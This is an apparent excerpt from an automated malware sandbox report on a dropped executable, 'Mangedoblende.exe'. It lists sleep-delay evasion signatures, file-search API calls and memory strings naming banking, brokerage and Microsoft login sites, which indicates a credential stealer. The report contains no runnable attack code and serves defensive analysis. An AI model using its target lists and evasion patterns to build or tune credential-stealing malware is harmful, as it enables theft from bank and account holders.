            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 598344Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 598234Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 598124Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 598015Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 597891Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 597781Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 597672Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 597562Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 597453Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 597344Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 597219Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 597109Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 597000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 596890Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 596780Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 596672Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 596562Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 596453Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 596344Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 596219Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 596109Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 596000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 595890Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 595781Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 595672Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 595562Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 595453Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 595344Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 595234Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 595125Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 595015Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 594897Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 594797Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 594687Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 594568Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7113Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2610Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeWindow / User API: threadDelayed 8486Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeWindow / User API: threadDelayed 1359Jump to behavior
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsc9301.tmp\nsExec.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeAPI coverage: 2.5 %
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5376Thread sleep time: -7378697629483816s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300Thread sleep count: 38 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300Thread sleep time: -35048813740048126s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300Thread sleep time: -599891s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 6556Thread sleep count: 8486 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 6556Thread sleep count: 1359 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300Thread sleep time: -599766s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300Thread sleep time: -599656s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300Thread sleep time: -599547s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300Thread sleep time: -599437s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300Thread sleep time: -599328s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300Thread sleep time: -599219s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300Thread sleep time: -599109s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300Thread sleep time: -599000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300Thread sleep time: -598890s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300Thread sleep time: -598781s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300Thread sleep time: -598672s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300Thread sleep time: -598562s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300Thread sleep time: -598453s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300Thread sleep time: -598344s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300Thread sleep time: -598234s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300Thread sleep time: -598124s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300Thread sleep time: -598015s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300Thread sleep time: -597891s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300Thread sleep time: -597781s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300Thread sleep time: -597672s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300Thread sleep time: -597562s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300Thread sleep time: -597453s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300Thread sleep time: -597344s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300Thread sleep time: -597219s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300Thread sleep time: -597109s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300Thread sleep time: -597000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300Thread sleep time: -596890s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300Thread sleep time: -596780s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300Thread sleep time: -596672s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300Thread sleep time: -596562s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300Thread sleep time: -596453s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300Thread sleep time: -596344s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300Thread sleep time: -596219s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300Thread sleep time: -596109s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300Thread sleep time: -596000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300Thread sleep time: -595890s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300Thread sleep time: -595781s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300Thread sleep time: -595672s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300Thread sleep time: -595562s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300Thread sleep time: -595453s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300Thread sleep time: -595344s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300Thread sleep time: -595234s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300Thread sleep time: -595125s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300Thread sleep time: -595015s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300Thread sleep time: -594897s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300Thread sleep time: -594797s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300Thread sleep time: -594687s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300Thread sleep time: -594568s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exeCode function: 0_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C13
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exeCode function: 0_2_0040683D FindFirstFileW,FindClose,0_2_0040683D
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_0040290B FindFirstFileW,6_2_0040290B
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,6_2_00405C13
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_0040683D FindFirstFileW,FindClose,6_2_0040683D
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 599891Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 599766Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 599547Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 599437Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 599328Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 599219Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 599109Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 599000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 598890Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 598781Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 598672Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 598562Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 598453Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 598344Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 598234Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 598124Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 598015Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 597891Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 597781Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 597672Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 597562Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 597453Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 597344Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 597219Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 597109Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 597000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 596890Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 596780Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 596672Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 596562Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 596453Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 596344Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 596219Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 596109Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 596000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 595890Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 595781Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 595672Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 595562Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 595453Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 595344Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 595234Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 595125Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 595015Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 594897Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 594797Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 594687Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeThread delayed: delay time: 594568Jump to behavior
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002074E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002074E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002074E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002042F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: powershell.exe, 00000002.00000002.2494742729.000000000557C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter@\eq
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002042F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002042F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
            Source: Mangedoblende.exe, 00000006.00000002.3334889586.00000000034B8000.00000004.00000020.00020000.00000000.sdmp, Mangedoblende.exe, 00000006.00000002.3334889586.000000000350D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002042F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: Mangedoblende.exe, 00000006.00000002.3346863955.000000001F4A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $eqEmultipart/form-data; boundary=------------------------8dd3278838ce892<
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002074E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
            Source: Mangedoblende.exe, 00000006.00000002.3346863955.000000001F540000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $eqEmultipart/form-data; boundary=------------------------8dd3298cde51afd<
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002074E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: ModuleAnalysisCache.2.drBinary or memory string: Get-NetEventVmNetworkAdapter
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002042F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002074E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002074E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002042F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002042F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002042F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002042F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002074E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002042F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: powershell.exe, 00000002.00000002.2494742729.000000000557C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter@\eq
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002042F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002074E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002074E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002042F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002074E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002042F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002042F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: ModuleAnalysisCache.2.drBinary or memory string: Remove-NetEventVmNetworkAdapter
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002074E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002042F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
            Source: powershell.exe, 00000002.00000002.2494742729.000000000557C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter@\eq
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002074E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002074E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002042F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002074E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002074E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002074E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002042F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: Mangedoblende.exe, 00000006.00000002.3334889586.000000000350D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002042F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002074E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002042F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002042F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002042F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002042F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002042F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002074E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002042F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002042F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002074E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002042F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002042F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002074E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002042F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002074E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
            Source: ModuleAnalysisCache.2.drBinary or memory string: Add-NetEventVmNetworkAdapter
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002042F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002042F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002074E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002074E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002074E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002074E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002074E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002074E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002074E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
